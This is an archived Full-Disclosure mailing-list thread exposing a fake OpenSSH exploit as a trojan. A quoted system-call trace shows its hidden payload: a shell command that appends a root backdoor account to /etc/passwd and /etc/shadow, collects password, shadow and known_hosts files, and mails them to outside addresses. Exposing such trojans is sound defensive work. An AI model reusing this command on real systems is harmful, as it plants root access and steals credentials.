[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <3F6A773F.30607@jackhammer.org>
From: pdt at jackhammer.org (Paul Tinsley)
Subject: new openssh exploit in the wild! * is FAKE
AS SH@!*
Great credentials to boot:
login: sys3
password: sys3
Think they would at least pass one out that wouldn't create an easily
"crackable" password...
KF wrote:
> printf("[*] sending shellcode\n")= 22
> popen("(echo "sys3:x:0:103::/:/bin/sh" >> /etc/passwd; echo
> "sys3:\\$1\\$nWXmkX74\\$Ws8fX/MFI3.j5HKahNqIQ0:12311:0:9999
> 9:7:::" >> /etc/shadow; /sbin/ifconfig -a >/tmp/.tmp;cat /etc/passwd
> /etc/shadow /root/.ssh*/known_hosts >> /tmp/.tmp;
> find /home -name known_hosts -exec cat {} >> /tmp/.tmp;cat /tmp/.tmp |
> /usr/sbin/sendmail -f ownage@....de
> m0nkeyhack@...ermarkt.de) &> /dev/null ; rm -f /tmp/.tmp;", "r") =
> 0x0804a6b0
>
>
> -KF
>
>
> gordon last wrote:
>
>> hi readers,
>> while i was staying idle in an so called 0day release channel on one
>> irc network some scriptkiddies were
>> talking about an new 0day release.
>>
>> in my backlog i can see the following:
>> ---cut
>> 08:09 [R4lph] *** r3t0r (r4lph@xxx) has joined channel #0dayz
>> 08:09 [R4lph] 0day: http://www.anzwers.org/free/m0nkeyhack/0d/
>> ---cut
>>
>> i looked at this piece of exploit... it is binary so i'am not sure if
>> this is a trojan or a backdoor or a virus. but i can't see anything
>> strange while sniffing the exploit traffic. and i got root on
>> serveral of my openbsd boxes with that. the bruteforcer seems to be
>> very good.
>>
>> i too looked at "strings theosshucksass" and found nothing suspicious.
>>
>> this exploit seems to be in the wild (underground) since beginning of
>> august.
>>
>> thats quite a long time i hope most admins are patching the systems
>> now... because the exploit is getting round faster and faster.
>>
>> if anyone can reverse engineer this piece it would be great if he
>> posts his resulsts on his list because iam really intressted on the
>> exploiting technique used for that bug.
>>
>> i cant get an idea on how to exploit this.
>>
>> hmm...
>> regards,
>> glast
>>
>> ------------------------------------------------------------------------
>> Ab sofort auch im Ortsbereich einfach die 0-10-13 vorw?hlen. Infos
>> unter www.tele2.de ? <http://www.tele2.de>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
Powered by blists - more mailing lists